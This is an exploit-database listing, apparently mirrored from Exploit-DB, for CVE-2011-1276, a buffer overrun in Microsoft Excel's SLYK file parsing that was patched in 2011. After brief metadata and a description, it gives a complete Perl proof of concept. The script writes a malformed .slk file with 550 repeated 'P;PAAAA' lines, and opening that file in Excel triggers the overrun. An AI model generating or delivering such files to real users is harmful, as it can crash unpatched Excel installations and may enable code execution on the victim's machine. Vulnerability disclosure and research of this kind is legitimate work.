header-logo
Suggest Exploit
vendor:
Excel
by:
webDEViL
9.3
CVSS
HIGH
Buffer Overrun
119
CWE
Product Name: Excel
Affected Version From: All
Affected Version To: All
Patch Exists: YES
Related CWE: CVE-2011-1276
CPE: a:microsoft:excel
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: ALL
2011

Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC

This PoC exploits a buffer overrun vulnerability in Microsoft Excel when parsing SLYK format files. The PoC creates a malicious SLYK file with 550 lines of 'P;PAAAA' followed by a single 'P' character. When opened in Excel, the buffer overrun occurs, potentially allowing arbitrary code execution.

Mitigation:

Microsoft released a patch for this vulnerability in 2011.
Source

Exploit-DB raw data:

# Exploit Title: Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC
# Date: [date]
# Author: webDEViL
# Software Link: [download link if available]
# Version: [app version]
# Tested on: ALL
# CVE : CVE-2011-1276

# w3bd3vil[at]gmail[dot]com
# twitter.com/w3bd3vil

open (FILE, '>>CVE-2011-1276.slk');
print FILE "ID;P\n";
print FILE "P;PAAAA\n"x550;
print FILE "P";
close (FILE);

Navigation

Suggest Exploit

Services By CQR